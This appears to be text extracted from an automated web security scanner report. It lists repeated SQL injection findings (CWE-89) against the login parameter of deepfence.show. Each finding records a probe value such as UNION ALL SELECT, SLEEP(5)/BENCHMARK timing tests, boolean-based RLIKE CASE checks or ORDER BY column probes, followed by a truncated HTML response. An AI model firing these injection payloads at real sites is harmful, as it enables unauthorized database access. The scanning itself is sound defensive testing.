--> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #1070\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1071\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RLIKE (SELECT (CASE WHEN (4346=4346) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1072\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1073\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1074\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1075\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1076\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1077\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1078\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io||\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1079\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1080\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #1081\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1082\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1083\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 